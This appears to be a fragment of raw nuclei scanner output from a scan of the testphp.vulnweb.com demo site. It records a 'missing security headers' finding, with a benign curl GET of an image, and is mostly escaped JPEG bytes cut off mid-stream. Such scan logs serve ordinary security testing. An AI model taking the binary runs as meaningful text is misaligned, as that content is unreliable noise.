#\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001a\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0002\\u0001\\u0003\\u0004\\u0005\\u0006\\ufffd\\ufffd\\u0000+\\u0010\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0000\\u0004\\u0007\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1AQ\\\"a\\u00142q\\ufffd\\u0005\\u0013$B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0003\\u0001\\u0002\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000'\\u0011\\u0000\\u0002\\u0002\\u0001\\u0004\\u0002\\u0002\\u0001\\u0005\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0011\\u0003\\u0004\\u0012!1\\u0005Q\\u00132A\\\"#3aq\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\ufffd\\ufffdd\\ufffdH䏺JU\\ufffd\\t\\u000f\\u0008\\ufffdi{\\u0015+f\\ufffd.7\\u003c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdB6\\ufffd˨\\ufffd\\ufffd\\ufffd\\ufffd͒\\u001bdס\\u001a\\ufffdi\\ufffdE\\ufffdn\\ufffd_\\ufffd\\ufffd%\\u001atN\\u000c\\ufffdpR\\ufffdH\\u001d\\ufffd,֝\\ufffd\\u0000\\u0001 \\u0014\\u0000@'DQ\\u0003\\u0000Qu?b\\ufffd-\\u0010\\u0005\\ufffdL\\u0000\\u0000\\t\\u0000\\u0000\\u0000-\\u0005\\ufffd\\u0001\\ufffd\\ufffd\\u000cH\\ufffd'A\\u0015F\\ufffd\\u001a\\ufffdʔ?z3G\\ufffd^\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdK\\ufffd)\\ufffdۓ\\ufffdl\\ufffd%\\ufffd\\ufffd\\\"䨤\\ufffd\\u001f\\ufffdu\\u0015Ed44\\ufffd2\\u0005\\ufffdS\\ufffdD\\u0002Y\\u0005F\\ufffd`\\u0000\\u0000H\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\r\\u0011L`\\\"\\ufffd)4(\\u000cF\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003%C\\ufffd9\\ufffd\\ufffd1F\\ufffd$\\ufffdc$\\ufffd\\ufffd\\u000f\\ufffd~\\ufffdQ_\\ufffdק{c'K\\ufffd#\\ufffd\\ufffdr|\\ufffdR\\ufffd\\ufffd(\\ufffdԤ\\ufffdI}#;\\ufffd\\ufffdk\\ufffdʚ\\ufffd\\ufffdϳf\\ufffd\\ufffd\\ufffdEmZ\\u0010\\ufffd\\ufffd\\u0012Kȶ\\ufffdА\\ufffd\\ufffdC\\u0001Z\\u001a\\ufffdB\\u0000\\ufffd\\u0006Ҵ1I\\n\\u0004\\ufffd\\u0000X\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\ufffd\\u001com\\ufffd\\u0004\\ufffd,\\ufffd7\\u000e\\ufffd}\\ufffd\\\\1\\ufffd,\\ufffd\\u001f\\u0017\\ufffd\\ufffd#\\ufffdwG\\ufffdϫ\\ufffd\\u0016\\ufffd\\ufffd\\ufffddPf\\ufffd\\u003c\\u0013\\ufffdK\\ufffd\\ufffdG\\ufffd4j\\ufffd\\ufffd\\u001c\\ufffdi\\ufffd$\\ufffd\\ufffd\\ufffda\\ufffd\\ufffd\\ufffdj\\ufffd4C\\u000b\\ufffd\\ufffd\\ufffdg\\ufffd8\\ufffd`\\ufffd.\\ufffdΜy)\\ufffdN\\ufffd\\ufffd?\\ufffd\\ufffdj\\ufffd\\ufffd\\u001a\\ufffd*\\ufffdw\\u0016\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd),\\u0012\\ufffd5b\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffdg%\\ufffd\\ufffd[7e\\ufffdb\\ufffd\\u001a\\ufffd\\u0000/\\ufffd$\\ufffdfiƎ֛3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdХ\\ufffd5b\\ufffdޥ\\ufffd@%Ţ\\u0008\\u0019v\\u0000\\u0000\\u0000\\u0014E\\u0012\\u0000M\\ufffd(\\ufffd\\u0018\\u0008\\ufffdw1h\\ufffd\\ufffd(\\ufffd\\ufffd\\ufffd\\u001e\\u001a7\\ufffd\\ufffdC\\u001c\\ufffd\\ufffd\\ufffd_\\ufffd\\u000c{,\\ufffd\\ufffdَ[]\\ufffd\\ufffdkp\\ufffd\\ufffdp}\\u001d?ĹI\\ufffd\\ufffd'\\ufffd\\u0026\\ufffdjq\\ufffd\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdWO\\ufffd\\ufffd\\ufffd\\ufffdkV\\ufffd\\ufffd\\ufffd}\\u001bq\\ufffd|\\ufffdc]\\ufffdq5\\u0018\\ufffd\\ufffdp\\u0013\\ufffdJ\\ufffd\\u00003\\ufffd\\ufffd]Fhe\\ufffd\\u0018\\ufffd\\ufffdK\\ufffd4\\ufffd%r}\\ufffd\\ufffdW\\ufffd\\ufffdà\\ufffd\\ufffdd\\ufffdh\\ufffd}\\ufffd\\ufffd-\\ufffd\\\\\\ufffd\\ufffd\\u001c\\ufffdE\\ufffd\\ufffd+B\\ufffd+^\\ufffd4j\\ufffd\\ufffd\\u0004\\u0010\\ufffd}\\ufffd\\u0004\\u000cN\\ufffdqb\\ufffd\\u0000Qe?e`6\\ufffd\\u001b~Ȣې\\ufffd6߲v\\ufffd\\ufffd܄\\u0026\\ufffd\\ufffd\\u0014C\\ufffd\\ufffdJ\\ufffdx\\ufffd\\n\\u003enjlԑ\\ufffd\\ufffd5CEY\\ufffd3\\ufffd\\ufffdj=\\ufffd\\nʱ\\ufffd\\ufffdեj\\ufffdб\\ufffd\\u0000N\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffdp\\ufffd\\ufffd\\ufffdk3\\ufffd\\ufffdҾ\\ufffd9\\ufffd\\ufffd\\ufffd}3t\\ufffd\\ufffd\\ufffdψ\\ufffd2J4\\ufffdN\\rvt\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u003e\\ufffdq\\ufffd%\\ufffd\\ufffd\\t\\ufffd\\ufffd\\u001fB\\ufffd\\ufffde\\ufffd\\u001bJ\\ufffd\\u001e\\ufffdQM\\\"(\\ufffd»^,]\\ufffde\\\\FG2k\\ufffdWAC\\ufffd\\r\\ufffd\\ufffd.\\ufffdbPQf\\ufffd\\ufffd\\ufffdt[^\\tP\\ufffd\\ufffdΣ\\ufffd(\\ufffd\\ufffd\\ufffd\\u00126\\ufffd6\\ufffdYlJ\\u0026\\ufffd\\ufffd\\ufffdI\\u0013D\\u003c\\ufffd\\ufffd\\ufffdd\\u0017 \\u0006\\ufffd\\ufffdp2\\ufffd\\u000e\\ufffd\\ufffdm%\\u000e6\\ufffd\\ufffd\\ufffduc\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd}\\ufffd\\ufffd\\u0000\\u001dl*⏝y\\ufffdJ\\u0019\\ufffdK\\ufffdNn\\ufffdN\\u0012x\\ufffd䋤rr%`\\u0006-W\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffdEd(\\ufffd\\u0003!\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdP\\ufffd8\\ufffd\\ufffdk\\ufffd\\ufffd\\u0005)\\ufffd?,\\u0000+\\ufffd\\ufffd\\ufffd;5\\u0012\\ufffd\\u000c2\\ufffd\\ufffd\\ufffd+\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\u0000e\\ufffd2\\ufffd\\t7\\ufffd6-\\\"v\\ufffd\\u0001f\\ufffdd\\ufffd\\u0026ͺXA\\ufffd\\ufffd\\ufffdSh\\u0000~\\ufffd\\\\\\ufffdW\\ufffd\\ufffd\\ufffd%O\\ufffd\\ufffdr\\ufffd\\ufffdc\\u0014\\ufffd\\u0004\\u003eΌ\\u001b\\ufffdCHe\\u0014\\u0000\\u0008\\ufffd\\ufffd\\u0007\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:25.069279789Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/46.0.2486.0 Safari/537.36 Edge/13.10586' 'http://testphp.vulnweb.com/pictures/2.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"clear-site-data\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"path\":\"/pictures/1.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/1.jpg.tn\",\"request\":\"GET /pictures/1.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4355\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:41:42 GMT\\r\\nEtag: \\\"4dca64a1-1103\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0001\\u0005\\u0003\\u0004\\u0007\\u0002\\ufffd\\ufffd\\u00004\\u0010\\u0000\\u0002\\u0001\\u0003\\u0004\\u0001\\u0003\\u0003\\u0003\\u0003\\u0004\\u0001\\u0005\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0011\\u0005\\u0012!1A\\u0006\\u0013Q\\\"a\\ufffd\\u0014q\\ufffd2\\ufffd\\ufffd#BR\\ufffd\\ufffd\\u0016b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0019\\u0001\\u0000\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0000\\u0004\\u0005\\ufffd\\ufffd\\u0000)\\u0011\\u0000\\u0002\\u0002\\u0001\\u0003\\u0002\\u0005\\u0004\\u0003\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0004!1\\u0012A\\u0005\\u0013Q\\ufffd\\ufffd2aq\\ufffd\\\"3\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffd\\u003e\\ufffd\\ufffdn?\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8ԝB\\ufffdw\\u0018Va\\ufffd9\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd]\\ufffd\\ufffd.\\ufffdH\\ufffdn\\t \\ufffd\\ufffdr2s\\ufffd\\u0006\\ufffd\\ufffdP\\u0003z\\ufffd\\ufffd8\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0006$}#\\ufffd\\ufffd\\ufffd\\ufffdW\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffd\\ufffdc ʸʮ\\u003c\\ufffd\\ufffd\\ufffd\\ufffd׹Er\\ufffd\\n/\\ufffdI\\ufffd\\ufffd\\ufffdj\\ufffd\\u0026\\ufffd\\ufffd\\ufffddY\\u0019@\\ufffdW\\ufffd\\ufffd#\\ufffdr\\u003e\\ufffdϚ\\ufffd\\ufffdlN^}\\ufffd\\u0015\\ufffd#3(|g\\ufffdp0rpO\\ufffd\\ufffdf\\ufffd\\ufffd}%%\\ufffd\\u0006kIE\\ufffdf\\ufffd\\u0010\\ufffd\\u0003\\ufffd\\ufffd\\u0007\\u001f\\ufffd\\ufffd\\u0006\\ufffdzf\\ufffd\\ufffd^\\ufffdC%Ƕ\\ufffd\\u0019\\u00140;C\\u001d\\ufffd\\u0018\\ufffd?\\ufffd\\ufffd\\ufffdz\\ufffd\\\\\\\\[\\ufffd\\ufffd\\u00025\\ufffdy.\\\\\\ufffd\\u00169۟\\ufffd8\\u001fڮ\\ufffd?\\ufffd\\u0019L3\\\\\\ufffd\\ufffd\\ufffd\\u0019#\\u00110\\ufffd\\\\x\\ufffd\\ufffd8\\ufffd#\\ufffd\\u001b\\ufffdZ\\u0015Ʃ|\\ufffd\\u001e5 夑\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdդ\\ufffd=\\u003e\\ufffd\\u001bI\\ufffdi\\ufffd;\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n2\\u0006\\u0007۳\\ufffdO^(\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffdP\\ufffd.\\ufffd\\ufffd_fEUR\\u0002}9\\ufffd\\ufffdr6\\ufffd\\ufffd\\ufffd\\ufffd\\u003ej\\ufffdg\\ufffd$g\\ufffd\\u0017$\\ufffd\\u000e\\ufffd{\\ufffd\\ufffd[\\ufffdL\\ufffd\\ufffd\\ufffd9\\ufffd,sXi\\u0026\\u0014y\\ufffd\\ufffd\\ufffdT\\ufffdb*E\\u0014VH\\ufffd\\ufffd퍌\\ufffdI,\\ufffd\\ufffd\\ufffdE\\ufffd\\ufffd0\\u0007\\u0007\\ufffd\\ufffd\\ufffd?\\ufffd\\u0015\\ufffd;\\ufffd\\ufffd\\u0017]\\ufffdJ\\ufffdX\\ufffd\\ufffdFd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$`c\\ufffd\\ufffd2\\ufffd0գ\\ufffd7\\u0016\\ufffdnח\\\"ј;2\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp;'9\\u0018\\ufffdz\\ufffd\\u0014\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd[)\\ufffd3Z\\ufffdorEY\\u000c\\ufffd\\u001e|\\u0011\\ufffdq\\ufffd|\\u001e\\ufffd\\ufffda\\u001e\\ufffdu$-\\u000bJ\\ufffd\\u001f;\\ufffd\\ufffd\\u0000p\\ufffd\\ufffd\\ufffd\\ufffd\\u0001\\ufffdT\\ufffd\\ufffd\\ufffd\\\"\\ufffdM\\ufffd\\ufffd1\\ufffd06\\ufffdۉ\\u0001O\\u0000\\ufffdg\\u001c\\ufffd\\ufffd\\ufffdN\\ufffd\\u003e\\ufffd\\ufffd\\ufffd\\ufffd,\\ufffd]\\ufffd%ܰ\\ufffd\\ufffdH\\u0010s\\ufffdO\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0015S\\ufffdz\\ufffdi\\ufffd%\\ufffd@\\ufffd\\ufffd@G\\ufffd\\u0007`,@#'\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffdZ\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdl\\u0004\\ufffdX\\ufffdX\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd.\\u0014\\ufffdA\\ufffdU\\ufffd\\\\6i\\nٱ\\ufffd\\ufffd-~\\\"2ƂDP\\ufffd\\ufffd`\\ufffd\\u0000\\u0003\\ufffd\\u0001\\ufffd\\ufffdV׿\\u0015\\u0014$\\ufffdm\\ufffd\\ufffdIsr\\ufffd0Uf\\ufffd\\ufffd\\u0014\\u0003\\ufffd\\ufffd.\\ufffdsq\\ufffd\\ufffd\\ufffdg\\ufffd\\ufffd\\ufffd]\\ufffd8\\u001fj\\ufffd\\u0006\\ufffd\\ufffdb\\ufffd/,\\ufffd\\u001e\\ufffd\\ufffd]B\\u0015\\\"\\ufffd\\ufffd\\nS\\ufffdp\\ufffd\\ufffd\\u003e3\\ufffd\\u0000\\\\S\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd6\\ufffdRI[\\u000258\\ufffd\\ufffd\\u0000\\u000b\\ufffd;\\ufffd\\u001d\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003cbDxAiJ\\ufffd\\u0026\\ufffdn8\\u000b\\ufffd\\u0007\\ufffd\\ufffd\\ufffd' f\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffd\\ufffd,jR\\u0018\\ufffd\\u0015Oǎ\\u0007\\u0003\\ufffd:\\ufffd\\ufffd\\ufffd+\\u001fO\\ufffdb\\ufffd\\ufffd\\u0017z\\ufffd\\ufffdF\\u0014\\ufffd\\u000bI\\u0003,b1\\ufffdS#$\\u00022\\t\\ufffd3\\ufffdq\\ufffd\\ufffd ^\\u0016$\\ufffd'\\ufffd\\ufffd\\u001e\\ufffdԭ\\ufffd-೾\\ufffdi\\ufffd\\ufffd\\ufffd*\\ufffd\\ufffd\\u0013g\\u00039##\\ufffd\\ufffd\\ufffd\\ufffd5\\ufffd\\ufffd?L\\ufffdH\\ufffd\\u0000D\\ufffd\\ufffdO\\ufffdIw\\ufffd\\u0000S}D\\ufffd\\ufffd\\u0000\\r\\ufffdpz\\ufffd\\ufffd\\u0010\\ufffdA\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\u001a\\ufffda\\ufffdto\\ufffd^\\ufffd\\ufffd\\ufffdv\\ufffd~\\ufffd1\\ufffd\\ufffd\\u0000\\ufffd\\u003c\\ufffd\\u000f\\ufffdU\\\\Zl\\ufffdh\\ufffd%\\ufffd\\u001e񊫊o\\u00004\\ufffd暮\\ufffdKD\\ufffd\\ufffdS\\ufffd\\ufffda\\ufffd,\\ufffd\\\"\\ufffdr\\\\\\u0004\\u001f\\ufffdT\\u001f\\u003c\\u000c\\ufffd\\ufffd\\ufffd\\u001aV\\ufffdK\\ufffd\\ufffd'\\ufffd*qEn\\ufffd\\u0000\\ufffd\\u0014b\\ufffd\\ufffd(\\ufffdՎ\\u000c\\ufffd\\u0018\\ufffd3\\ufffdg\\u0015Ҵ\\ufffd\\u001d,\\\\$\\ufffdE\\ufffd\\ufffd\\ufffd}\\ufffd\\ufffd\\u00021\\ufffdO\\u001d\\ufffdۏ\\ufffd\\ufffd\\ufffd\\u0004]'G\\ufffd\\ufffd\\ufffd\\ufffdx!wH\\ufffd\\u0007j\\ufffd\\ufffd|\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd\\u0017\\ufffd\\ufffd\\ufffd\\ufffd\\u0004wz\\\\x\\u0018B\\ufffd\\ufffd\\ufffd\\u0014dy\\ufffd\\ufffdG\\ufffd\\ufffd-\\ufffd\\ufffdr\\ufffd\\ufffd\\ufffd\\u003eL\\ufffdMR\\ufffd!\\ufffd\\ufffd\\ufffdKh\\ufffd$\\u0026]\\ufffdI\\ufffd\\u0002\\n\\ufffds\\ufffd\\ufffd?ǐ+\\ufffdkz5\\ufffd\\ufffd\\ufffd\\ufffd=\\ufffdR\\ufffd\\u0007!b\\ufffdNJ\\ufffd\\u001b\\ufffd\\u001dq\\ufffds\\ufffd8\\u00184\\ufffdt\\ufffdm\\ufffd\\ufffd\\ufffd\\u00067\\ufffdwb\\ufffd\\t`\\ufffd\\ufffd\\ufffd{\\u0001\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\ufffd\\u001e\\ufffd\\ufffd\\u000f\\ufffd9\\ufffd,c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd$\\u0003\\ufffd\\u001dW.\\ufffdR\\ufffd\\nO+\\ufffd\\ufffd4\\ufffd\\u0017\\u0008\\ufffd\\ufffd\\u0018\\ufffdr.\\rx\\ufffd\\ufffd\\ufffd!\\u0014\\ufffd\\u0000;=U\\ufffdiw6:\\ufffd\\ufffdȻ\\ufffd\\u0019L{\\ufffdK#\\u0010q\\ufffd\\ufffd`\\ufffd:6\\u000eFA\\u001eE8zwVKM6In\\ufffdnj2\\ufffd]Ý\\ufffd\\ufffd\\ufffdDn8\\u0000\\ufffd\\u003eOc5\\u0018K`\\ufffd:\\ufffd\\ufffdv\\ufffd|Q\\ufffd^\\u0018/\\u00034\\ufffd$\\n\\u0000\\ufffd\\u0007\\u0005\\ufffd\\u000c\\u001bpny\\ufffd\\u003c\\u001a痷r\\\\\\\\\\u003c\\ufffd9wc\\ufffd\\ufffd\\u0026\\ufffdk[\\ufffd\\ufffd\\u0006Q\\\"\\ufffdޥ\\\\0\\ufffd\\ufffdu\\ufffd\\ufffd\\u001e\\u0008\\ufffdWf\\ufffd\\u001cD\\u0005\\ufffd\\ufffd\\ufffdOep\\ufffd[?\\ufffd(\\ufffd\\ufffd\\ufffd~\\ufffd\\ufffd\\ufffd\\ufffdyđ\\ufffdwl\\ufffdVf6\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffd\\ufffd?\\ufffds\\ufffd\\ufffd\\ufffd)\\u0017LA-\\ufffd1\\ufffd\\u003c\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0019\\ufffd\\ufffd\\u0001\\ufffd\\ufffd8ìZ\\ufffd@\\ufffd~\\ufffd\\u000c\\ufffd!̲\\ufffdk\\ufffd\\ufffd\\ufffd/dp{㓎\\ufffd\\t\\ufffd\\u0000%\\ufffd\\ufffda\\ufffd\\u001d6\\u001d2\\ufffd\\ufffd\\ufffd0̒\\ufffd\\ufffdG\\u0004\\ufffd\\ufffdC\\u0002\\u0001\\ufffd \\ufffd\\u003e|\\ufffd\\ufffdt\\ufffd:E\\ufffd\\ufffdQ\\ufffd\\u000b\\u001a\\ufffd\\ufffd\\ufffd6\\ufffdL\\u000c\\ufffd$\\ufffd\\u0007\\u0007\\ufffdy\\ufffd)\\ufffdH\\ufffd\\ufffd\\ufffd{\\u0010\\ufffdH6)\\ufffd\\u000fy\\u0004\\ufffd`\\ufffd)\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{\\ufffdr(\\ufffd#\\ufffd\\ufffd\\ufffdRA)\\ufffd\\u001cřd\\ufffd\\ufffd\\ufffdo\\u0001p\\u0000-\\ufffd\\u003c\\ufffd\\ufffdx.\\ufffd\\ufffdO\\u000c\\ufffde\\ufffd\\ufffd\\ufffd(\\ufffd/z\\ufffd\\ufffdؘ\\ufffd\\ufffdwq\\u000e\\\"\\ufffd\\ufffd\\ufffdF\\u0006\\u003e\\ufffd\\ufffd|\\ufffdr\\t\\u0002\\ufffd\\ufffd4\\ufffd\\ufffdO\\ufffd\\ufffdsfR~\\ufffd]\\ufffdt\\u0008\\ufffd\\ufffd?a\\ufffd\\ufffd:w\\ufffd4x\\ufffd.\\u000c\\ufffd\\ufffd\\ufffd!V}\\ufffd˲\\ufffd\\ufffd;\\u001c\\ufffd\\ufffd\\u0006G\\u001d\\u000e\\ufffdk\\u0016\\ufffd\\ufffd\\ufffdjV\\ufffd]\\ufffdJZ(\\ufffd%L\\ufffd\\u0001\\t\\ufffdr\\u003ca8\\ufffd?\\ufffdB\\ufffd\\ufffd+\\ufffdㇷs4\\ufffd i~\\ufffd7\\ufffdt\\ufffd\\ufffd\\ufffdd\\u0019\\u0018\\ufffd\\u0008\\ufffdx+\\ufffd'\\u0019?P\\ufffd\\ufffd\\u001e2E%ݻ[L\\ufffd9R\\ufffd\\ufffdӑ\\ufffd\\u003ez|\\ufffd5\\u000bq\\ufffd\\u000bKkt@[q+\\ufffd\\u000e\\ufffd\\u0004\\u0003\\ufffd􁜌\\ufffd\\ufffdy4\\ufffd:\\u0016bO\\u0026\\ufffdknK,ViԨɬ\\ufffd\\u003ez5\\ufffdS\\ufffd)\\ufffd\\u0002\\ufffd@\\ufffd\\ufffd\\ufffdX㳑\\ufffd\\t\\u0016P\\ufffd\\u0007,\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffdM\\ufffd庂\\ufffd\\u0026\\ufffd$\\ufffd\\t\\ufffdr\\u0007A\\ufffd\\u0012r8\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdS\\ufffd\\\\Igw\\u0015\\ufffd\\r\\ufffdH\\ufffd\\ufffd8\\ufffd4æIst\\ufffd\\u000f#\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\u0007\\ufffd\\ufffd+\\ufffd\\ufffdU\\ufffd\\ufffd/^\\ufffd'\\ufffd\\ufffdY\\ufffd\\ufffd\\ufffd'\\ufffdh\\u001c\\ufffd\\u0019\\ufffdX\\ufffd\\ufffdH'\\ufffdv9\\ufffd`\\ufffdx\\ufffd\\r^oOI,m\\u0014L\\ufffd\\ufffd\\ufffdu\\u000b\\ufffd-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\u0018,:\\ufffd\\ufffdjz}\\ufffd\\u0007\\ufffd)\\u0019\\ufffd\\u001aC\\ufffd\\u0002O\\ufffd\\ufffd$\\ufffd\\ufffd\\ufffdƥo4A^DuG\\ufffd\\ufffd*@lw\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\te\\ufffdm\\ufffd\\ufffd2e\\u001d\\ufffd\\ufffdf#\\u001d\\ufffd\\ufffdj\\ufffd\\u0019\\ufffd\\u0015\\ufffd*\\ufffd\\ufffd\\ufffd#\\u0019\\ufffd\\u001a\\ufffd\\u0004+\\ufffdYZy\\u001a\\u0015\\ufffd\\ufffd1\\ufffd$)\\u003c\\u0003\\ufffd\\ufffd5\\\"\\ufffdc\\u0026\\ufffd'4f\\ufffd4S\\ufffd\\u0000\\ufffdk=\\ufffd\\ufffdo4r\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\u0008\\ufffd\\ufffdׯJpj\\ufffd\\ufffd\\u0006\\ufffdL\\ufffdw\\ufffd\\u0007\\ufffde0\\ufffd\\ufffdVy\\u0002`g\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd'\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffdV\\ufffd\\ufffd,\\ufffd\\ufffd7\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffd\\u0015=tx\\ufffd\\ufffdiV\\ufffdRM\\u003e\\ufffd$Aj\\ufffd\\ufffdG\\ufffdI!\\ufffd\\u0010U\\ufffd…\\u0003\\u0019\\ufffd$\\u001e\\ufffd\\ufffd\\ufffd*\\ufffdmF{۝\\ufffd;I+vO%\\ufffd\\ufffd\\ufffd4\\ufffd\\ufffd6y\\ufffd\\u0008\\u003c\\u